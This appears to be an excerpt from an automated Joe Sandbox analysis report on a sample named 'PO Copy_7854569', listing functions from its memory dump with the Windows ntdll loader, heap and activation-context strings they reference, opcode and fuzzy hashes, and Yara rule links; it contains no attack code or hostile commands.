                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                            • API String ID: 0-861424205
                            • Opcode ID: 47b2953cb1204e38cd254324d98e46b581eeb98ee4e738f1336a1ef0f06f00f4
                            • Instruction ID: f742d4db103c3e98efe3009e8990b7fcc7388f96110da735c26decde7f87d9a8
                            • Opcode Fuzzy Hash: 47b2953cb1204e38cd254324d98e46b581eeb98ee4e738f1336a1ef0f06f00f4
                            • Instruction Fuzzy Hash: 55314B36F8021577E7218A998C91F6B7F7DDBA4A41F09406DFB0567245D770AE01CBE0
                            Function 0166C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializeImportRedirection, xrefs: 016A8177, 016A81EB
                            • Loading import redirection DLL: '%wZ', xrefs: 016A8170
                            • minkernel\ntdll\ldrredirect.c, xrefs: 016A8181, 016A81F5
                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 016A81E5
                            • LdrpInitializeProcess, xrefs: 0166C6C4
                            • minkernel\ntdll\ldrinit.c, xrefs: 0166C6C3
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-475462383
                            • Opcode ID: f4434d840c7757ab428556f10e3e2e3a5c745d2ce40dde8e071c837ab041d09f
                            • Instruction ID: fc8f0fe6f3809db7fe7533e5a246776f2350cabf7d485628395d04b3a8e471aa
                            • Opcode Fuzzy Hash: f4434d840c7757ab428556f10e3e2e3a5c745d2ce40dde8e071c837ab041d09f
                            • Instruction Fuzzy Hash: F13104716447429BD224EF28DC45E2A77A9FF94B20F04055CFD85AB391E720EC05CBA6
                            Function 0167096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 01672DF0: LdrInitializeThunk.NTDLL ref: 01672DFA
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670BA3
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670BB6
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670D60
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01670D74
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                            • String ID:
                            • API String ID: 1404860816-0
                            • Opcode ID: 47da76abc41be5ab037df691bf36d8aa76f094706d73c7b1dfb3c6ecb7cc8064
                            • Instruction ID: cac059d1544e5996362dead2e0183b03d6c1e23271225ed025758cd42bcbe7cc
                            • Opcode Fuzzy Hash: 47da76abc41be5ab037df691bf36d8aa76f094706d73c7b1dfb3c6ecb7cc8064
                            • Instruction Fuzzy Hash: 27424971900715DFDB61CF28CC80BAAB7F5FF45314F1485AAE989AB241E770AA85CF60
                            Function 0163A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                            • API String ID: 0-379654539
                            • Opcode ID: 0bd0977bfbc89a516d3ef7d7c3b47aee9d46e74825cb18af96d214319f3af830
                            • Instruction ID: 2639f170fb5fd719aa215ae6d13ecdb979c491122e94bd23b8244d3ddc9dbc1f
                            • Opcode Fuzzy Hash: 0bd0977bfbc89a516d3ef7d7c3b47aee9d46e74825cb18af96d214319f3af830
                            • Instruction Fuzzy Hash: 53C16675108382DBDB11CF98C844B6AB7E4AF84704F04896EF9D6CB391E734C94ADB56
                            Function 01668402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 01668591
                            • LdrpInitializeProcess, xrefs: 01668422
                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0166855E
                            • minkernel\ntdll\ldrinit.c, xrefs: 01668421
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1918872054
                            • Opcode ID: 5a94b7345f303f942d0503b48b8cd3c75fcbabe74936a378d6d99d63c2d1868d
                            • Instruction ID: 034e3e22dafe4dd8df2a18b862e24a794c91e2bf357194616241309b9c7638d5
                            • Opcode Fuzzy Hash: 5a94b7345f303f942d0503b48b8cd3c75fcbabe74936a378d6d99d63c2d1868d
                            • Instruction Fuzzy Hash: 70919871508345AFD722EE25CC90FABBBEDEB84744F80092EFA8593251E730D9048B66
                            Function 0166273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                            Download Yara Rule
                            Strings
                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016A22B6
                            • SXS: %s() passed the empty activation context, xrefs: 016A21DE
                            • .Local, xrefs: 016628D8
                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016A21D9, 016A22B1
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                            • API String ID: 0-1239276146
                            • Opcode ID: 0ad6c3f77f868d809283b81c6809810301018dc0d6407e507ca4ea732cf541e4
                            • Instruction ID: aa8c8df2cbfc49f90b58a7668c156cb5a9be3ddd2601a0091a6d5e23b61110f7
                            • Opcode Fuzzy Hash: 0ad6c3f77f868d809283b81c6809810301018dc0d6407e507ca4ea732cf541e4
                            • Instruction Fuzzy Hash: FFA1C03194022ADBDB24CF69CC94BA9B7B9BF98314F1542EDD908A7351D7309E81CF94
                            Function 01664AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                            Download Yara Rule
                            Strings
                            • RtlDeactivateActivationContext, xrefs: 016A3425, 016A3432, 016A3451
                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 016A342A
                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 016A3437
                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 016A3456
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                            • API String ID: 0-1245972979
                            • Opcode ID: 01d2b303a1a0176346bd58ffee2a078bf11382f25f40d16d43fd32564f986b4f
                            • Instruction ID: b6089991a24e6473212aa42edbfc636ef8dbec207093a63e64b376b38accebcf
                            • Opcode Fuzzy Hash: 01d2b303a1a0176346bd58ffee2a078bf11382f25f40d16d43fd32564f986b4f
                            • Instruction Fuzzy Hash: 1261FE366017129BD7228F1DCC81B2AB7E9FF80A50F58852DE9569B345CB30EC01CB95
                            Function 016364AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                            Download Yara Rule
                            Strings
                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01690FE5
                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0169106B
                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 016910AE
                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01691028
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                            • API String ID: 0-1468400865
                            • Opcode ID: 12eeaba6f1af4b72c9e2da77336c1955ab52c9b181f381bb9d1f41117a0a0919
                            • Instruction ID: 9da24680ef55ab4f117a24e2a1a905d8af36b410c9b18ef0167eab36ed91dc7d
                            • Opcode Fuzzy Hash: 12eeaba6f1af4b72c9e2da77336c1955ab52c9b181f381bb9d1f41117a0a0919
                            • Instruction Fuzzy Hash: BD71CCB1904305AFCB21EF18CC84B9B7BA9EF94764F40446CF9498B286D734D689CBD6
                            Function 0165245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                            Download Yara Rule
                            Strings
                            • LdrpDynamicShimModule, xrefs: 0169A998
                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0169A992
                            • apphelp.dll, xrefs: 01652462
                            • minkernel\ntdll\ldrinit.c, xrefs: 0169A9A2
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-176724104
                            • Opcode ID: dc6498c9903d4ec21eab57820fc2f1fa9f7380471ed39ae612404877fd9a74ff
                            • Instruction ID: 2ad70fdfd9d97c4ae6316be7edb5fb834a3be807c261a6ac4df356eb7812fd25
                            • Opcode Fuzzy Hash: dc6498c9903d4ec21eab57820fc2f1fa9f7380471ed39ae612404877fd9a74ff
                            • Instruction Fuzzy Hash: D531F371A40201EBDB319F9DDC91A6ABBF9FB84724F25405DFD01A7345C7B45982CB90
                            Function 016429A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                            Download Yara Rule
                            Strings
                            • HEAP: , xrefs: 01643264
                            • HEAP[%wZ]: , xrefs: 01643255
                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0164327D
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                            • API String ID: 0-617086771
                            • Opcode ID: f1ef7b85c365377b37605d77a037341ef24ece4c4aaddf71a2f90990b071d337
                            • Instruction ID: bc8d6cad3b6349b15c91bde117fa05b36b0230c6e7a266d5f9b967fae5def309
                            • Opcode Fuzzy Hash: f1ef7b85c365377b37605d77a037341ef24ece4c4aaddf71a2f90990b071d337
                            • Instruction Fuzzy Hash: 3392CC71A042599FDB25CF68D8547AEBBF1FF48304F28809DE899AB391D734A942CF50
                            Function 01640770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-4253913091
                            • Opcode ID: 71711f20b11251701f7cdc5df1350438474c15501727f32c664751c4f922e52a
                            • Instruction ID: d6b6a0e1b8e32fe976f1f2c4ae50a55a06479830518b46043b450857e30ab85b
                            • Opcode Fuzzy Hash: 71711f20b11251701f7cdc5df1350438474c15501727f32c664751c4f922e52a
                            • Instruction Fuzzy Hash: ECF1BF74700616DFEB16CF68CC94BAAB7B5FF45304F1481A9E6069B381D734E982CB90
                            Function 01656962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: $@
                            • API String ID: 0-1077428164
                            • Opcode ID: 974c339399dc2f5e59bca3ad087799883004f48c1214db7568ebb8d957aba868
                            • Instruction ID: 456230dca04a09636e69d997e0c64752c6b369bc94118809bf403d1805aa0f20
                            • Opcode Fuzzy Hash: 974c339399dc2f5e59bca3ad087799883004f48c1214db7568ebb8d957aba868
                            • Instruction Fuzzy Hash: 41C27C71A083519FEB65CF28CC81BABBBE5AF88754F44892DE98987341D734D805CB92
                            Function 0162A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: FilterFullPath$UseFilter$\??\
                            • API String ID: 0-2779062949
                            • Opcode ID: 4ebf7d0d7b5d58fb58863e72a5b4b9171012043f0bb135e01ad1f343e940868e
                            • Instruction ID: 5a103607fb7acfe6f5db095d844314d97ee493f82c4fabe8242cb0feacd81982
                            • Opcode Fuzzy Hash: 4ebf7d0d7b5d58fb58863e72a5b4b9171012043f0bb135e01ad1f343e940868e
                            • Instruction Fuzzy Hash: D7A19F719116299BDB31EF68CC88BEAB7B8EF44700F1041E9EA09A7250D7359EC5CF54
                            Function 01650BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                            Download Yara Rule
                            Strings
                            • LdrpCheckModule, xrefs: 0169A117
                            • Failed to allocated memory for shimmed module list, xrefs: 0169A10F
                            • minkernel\ntdll\ldrinit.c, xrefs: 0169A121
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-161242083
                            • Opcode ID: 0810de22944124d481e16a8fa975439f32a38661e1f71626d6410f245582c061
                            • Instruction ID: 24fc9e7f2ad8d8a10db0d5ec0b6cebf8eec4b2c45aee4ba3a2a099389218b13c
                            • Opcode Fuzzy Hash: 0810de22944124d481e16a8fa975439f32a38661e1f71626d6410f245582c061
                            • Instruction Fuzzy Hash: D071DE71A002069FDF25DFA8CD81AAEB7F5FB48318F14846DE902A7351E734AD82CB54
                            Function 01640A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-1334570610
                            • Opcode ID: d212b443b3b421693a8627b175ec8dc492d1eece86fec2f8e1b85f32e2dcddf8
                            • Instruction ID: 60118828ab1e5a64887917a718a6ea6aa08abab434930c10012835070f2f0da3
                            • Opcode Fuzzy Hash: d212b443b3b421693a8627b175ec8dc492d1eece86fec2f8e1b85f32e2dcddf8
                            • Instruction Fuzzy Hash: 17617D70600311DFDB29DF28C880BAABBE6FF45704F14855EE95A8B392D771E881CB95
                            Function 0166C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializePerUserWindowsDirectory, xrefs: 016A82DE
                            • Failed to reallocate the system dirs string !, xrefs: 016A82D7
                            • minkernel\ntdll\ldrinit.c, xrefs: 016A82E8
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-1783798831
                            • Opcode ID: ad442f005dee9f8d3d5b998c1c309ca31b8f96aff5f241c864c1921c541c007e
                            • Instruction ID: 773f91d72a5221efc1c2aa93c2d36f06890f233946b78515050b4deb9e3c2944
                            • Opcode Fuzzy Hash: ad442f005dee9f8d3d5b998c1c309ca31b8f96aff5f241c864c1921c541c007e
                            • Instruction Fuzzy Hash: D341DF71544711ABC731EF68DC44B6B7BE9FF48760F04892EFA8993290E774E8018B95
                            Function 016EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                            Download Yara Rule
                            Strings
                            • @, xrefs: 016EC1F1
                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 016EC1C5
                            • PreferredUILanguages, xrefs: 016EC212
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                            • API String ID: 0-2968386058
                            • Opcode ID: 56c3533dafbe3cc0abf971a1e3ed868a0161f709df9169477aa8a19563a13902
                            • Instruction ID: d99623e93f2791ff2da7e3f68c4e16b262ab13ac0559919a9e9304e470b5596b
                            • Opcode Fuzzy Hash: 56c3533dafbe3cc0abf971a1e3ed868a0161f709df9169477aa8a19563a13902
                            • Instruction Fuzzy Hash: C4418272E01219EFDB11DBD8CC95FEEBBF9AB14700F04816AEA09B7240D7749A44CB54
                            Function 016C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                            • API String ID: 0-1373925480
                            • Opcode ID: 7c5d548c6b4fda88a2ed047db7b90d520d734df81abdb8e5f06b7359fd1f389d
                            • Instruction ID: c6f767f9df05b756ec5a5876de1b6728450e3ee29c47f72c76cf525975d168af
                            • Opcode Fuzzy Hash: 7c5d548c6b4fda88a2ed047db7b90d520d734df81abdb8e5f06b7359fd1f389d
                            • Instruction Fuzzy Hash: F041E572A00258CBEB26DB99CC60BBDBBB6FF95740F14045DD941EB791DB398901CB14
                            Function 016B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            Strings
                            • LdrpCheckRedirection, xrefs: 016B488F
                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 016B4888
                            • minkernel\ntdll\ldrredirect.c, xrefs: 016B4899
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                            • API String ID: 0-3154609507
                            • Opcode ID: 19ea1486018ac41c95fba4c10003f831fc05026f665418ea511044a1bec42a91
                            • Instruction ID: 5bf7627d6ced700a9ac39eeff2fa3c1e0dd1f080b50b4d9480bc834aa17c5c7e
                            • Opcode Fuzzy Hash: 19ea1486018ac41c95fba4c10003f831fc05026f665418ea511044a1bec42a91
                            • Instruction Fuzzy Hash: 6A41C132A046619BCB21CE5CDCC0AA67BE9EF49650B06056DED8A97353DB30E881CB91
                            Function 01640BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                            • API String ID: 0-2558761708
                            • Opcode ID: 6637ac4e7b41ac381522e577435a3c395ba2fa1cc61343777d7feeb72ba18d1b
                            • Instruction ID: 31b2134ba4a5533491390a767c400e49fba9ab0807a1c703ec37d424fc00d30e
                            • Opcode Fuzzy Hash: 6637ac4e7b41ac381522e577435a3c395ba2fa1cc61343777d7feeb72ba18d1b
                            • Instruction Fuzzy Hash: 3911E4313165519FDB6ACA18CC40BB6B3AAEF40B15F14812EF607CB251DB30D841CB99
                            Function 016B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                            Download Yara Rule
                            Strings
                            • LdrpInitializationFailure, xrefs: 016B20FA
                            • Process initialization failed with status 0x%08lx, xrefs: 016B20F3
                            • minkernel\ntdll\ldrinit.c, xrefs: 016B2104
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                            • API String ID: 0-2986994758
                            • Opcode ID: b073e5a0e72955d3f8431e99659a3c44b7482b1fe78d67b285bd40ad9cb4f381
                            • Instruction ID: 6f91019a3bcca5e258a5f756d6c502f67b437b5d4c5d4d802c29337080164235
                            • Opcode Fuzzy Hash: b073e5a0e72955d3f8431e99659a3c44b7482b1fe78d67b285bd40ad9cb4f381
                            • Instruction Fuzzy Hash: 79F02834640308ABE734EA4CDCA2FDA3BA9EB40B25F14001CFB0167385D2B0A980C750
                            Function 016403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: #%u
                            • API String ID: 48624451-232158463
                            • Opcode ID: e983e688c7fff2cacdf01cc165d87aac732fa6792e488dbf0b376a26b919461b
                            • Instruction ID: 9d6b3936c728c4c8ae56b96ae997efa148e4b0f251c6c23f7cab5d8254186f32
                            • Opcode Fuzzy Hash: e983e688c7fff2cacdf01cc165d87aac732fa6792e488dbf0b376a26b919461b
                            • Instruction Fuzzy Hash: AB714772A0115ADFDB01DFA8CD90BAEBBF9BF08304F144069E905A7351EB34E942CB65
                            Function 0163A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                            Download Yara Rule
                            Strings
                            • LdrResSearchResource Exit, xrefs: 0163AA25
                            • LdrResSearchResource Enter, xrefs: 0163AA13
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                            • API String ID: 0-4066393604
                            • Opcode ID: df330b2ef7d2fee4beb60bde634db5e422241e20436eba0609c25671a07e5323
                            • Instruction ID: 0fa1ac709270d09d5e441fdcdcd98771457bae6eb7ed573d3b981f795b65fcd2
                            • Opcode Fuzzy Hash: df330b2ef7d2fee4beb60bde634db5e422241e20436eba0609c25671a07e5323
                            • Instruction Fuzzy Hash: C0E15F71A00219ABEF26CEEDCD94BAEBBBABF84310F104529E941E7351D7349942DB50
                            Function 016FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: `$`
                            • API String ID: 0-197956300
                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                            • Instruction ID: 1ce342ccc6aeea194e62df032ee67d8aef414e86bc38fb7eb15cc68068a358d6
                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                            • Instruction Fuzzy Hash: F8C1BE312043429BEB25CF68CC45B6BBBE6AFC4318F084A2DF69ACB290D775D505CB95
                            Function 016AE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID: Legacy$UEFI
                            • API String ID: 2994545307-634100481
                            • Opcode ID: ad96d5974e79df209c32df9112dec11b1f00ef16181401250d1d5d27a5a00908
                            • Instruction ID: 8326a6b868267e4433b5570d0579c4bafc604de7daf77a70ffcc54dc5f243c4b
                            • Opcode Fuzzy Hash: ad96d5974e79df209c32df9112dec11b1f00ef16181401250d1d5d27a5a00908
                            • Instruction Fuzzy Hash: EF613871E006199FDB25DFA88C80AAEBBB9FB44700F55406EE649EB291D732ED01CF54
                            Function 016D43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.2120419715.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_1600000_PO Copy_7854569.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$MUI
                            • API String ID: 0-17815947
                            • Opcode ID: 345fcb049661e7bd986190fdb6178bc08b7d7d487442fe946c6b9cee2d190627
                            • Instruction ID: d09fccbffcf3f3065a66969aec7222bbc2be32331080d14c2cfc8f19b7003da9
                            • Opcode Fuzzy Hash: 345fcb049661e7bd986190fdb6178bc08b7d7d487442fe946c6b9cee2d190627
                            • Instruction Fuzzy Hash: EB512871E0021DAFDF11DFA9CC90AEEBBB9EB44754F100529EA11B7690DB309D45CBA4
